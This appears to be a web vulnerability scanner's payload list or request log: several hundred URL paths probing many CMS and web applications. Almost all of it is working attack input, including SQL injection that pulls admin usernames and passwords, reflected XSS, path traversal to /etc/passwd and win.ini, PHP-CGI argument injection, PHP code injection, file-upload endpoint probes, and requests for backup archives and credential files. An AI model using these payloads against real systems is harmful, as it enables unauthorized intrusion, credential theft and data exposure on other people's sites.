/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/
/wp-admin
/admin.php
/jsky_web_scanner_test_file.txt
/dede/
/administrator/
/nosec_Web_Scanner_Test.dll
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/user
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/TRACE_test
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/TRACK_test
/
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/_vti_bin/_vti_adm/admin.dll
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/_vti_bin/_vti_aut/author.dll
/_vti_bin/shtml.exe?_vti_rpc
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/server-info
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/server-status
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/jmx-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web-console/
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/.../.../.../.../.../.../.../.../windows/win.ini
/webscan360noThisFile*~1*/.aspx
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/etc/passwd
/etc/passwd
/phpMyAdmin/show_config_errors.php
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/xampp/index.php
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/?search=just_test_not_find_href
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/$
/.../.../.../.../.../.../.../.../etc/passwd
/solr/dev/admin/
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/level/15/exec/-/show/running-config/CR
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/plugins/weathermap/weathermap-cacti-plugin.php
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%3Cscript%3Ealert(42873).do
/icons/index
/%3Cscript%20s%3Ealert(42873)
/icons/small/index
/?%22onmouseover='prompt(42873)'bad=%22%3E
/%22%3E%3CsCrIpT%3Eprompt(42873)
/?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/'IHLD
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/install.php
/install/index.php
/fckeditor/editor/dialog/fck_about.html
/extras/curltest.php?url=file://curltest.php
/.svn/entries
/include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
/wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
/plus/carbuyaction.php
/plus/carbuyaction.php?dopost=return&code=../../index
/api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
/yp/product.php?q=&action=searchlist&where=%23
/indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
/yp/product.php?pagesize=$%7B@print(md5(42873))%7D
/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
/invoker/EJBInvokerServlet/
/invoker/JMXInvokerServlet/
/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/
/_database/qiye_free.asp
/apps/include.php?file=index.php
/huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
/manage/login.php
/vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
/api/upload/swfthumbnail.php?id=../../include/common.inc.php
/Inc/conn.asp
/user/reg3.php
/
/News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
/CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
/ask/search_ajax.php?q=s%bb%27
/yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
/web/?id=-1'
/huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
/
/js/calendar.php?lang=../js
/
/xampp/showcode.php/showcode.php?showcode=1
/index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
/login.php
/admin/index.asp
/Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
/phpcms/data/js.php?id=1
/index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
/plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
/flow.php?step=login
/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
/
/Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?user-getpass-1'
/?user-space-1'
/index.php
/admin/sysadmin_view.asp
/
/include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
/index.php?user-getpass
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
/member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
/register.php?do=submit
/management/login.asp
/index.php?-dauto_prepend_file%3d/etc/passwd+-n
/
/tools/ajax.aspx
/show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
/admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
/bom.php?dir=.
/phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
/myly.aspx?username=test'%20and%20@@version%3E0--
/go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
/?product-gnotify
/Index.action
/index.action
/login.action
/
/index.php/api/xmlrpc
/CVS/Root
/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
/index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
/plugin.php?id=Network114:Network114&ljtype=1%bf%27
/group/group.php?id=1%27webscan_draGxn
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
/index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/upload/flow.php?step=update_cart
/user.php?act=is_registered&username=%CE%27360webscan%23
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/zhuti/360webscan'
/js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
/js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
/search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
/WEB-INF/web.xml
/api.php?action=File&ctrl=download&path=api.php
/?/people/360webscan?notification_id-360webscan'
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admin/manageAPP.php
/index.php?m=poster&c=index&a=poster_click&id=1
/yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
/?/search/ajax/search_result/search_type-all__q-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
/api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
/do/s_rpc.php
/new2/s_rpc.php
/video/s_rpc.php
/photo/s_rpc.php
/news/s_rpc.php
/plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/page/html/?360webscan'.html
/Admin/sqlPlatform/operateSql.aspx
/respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
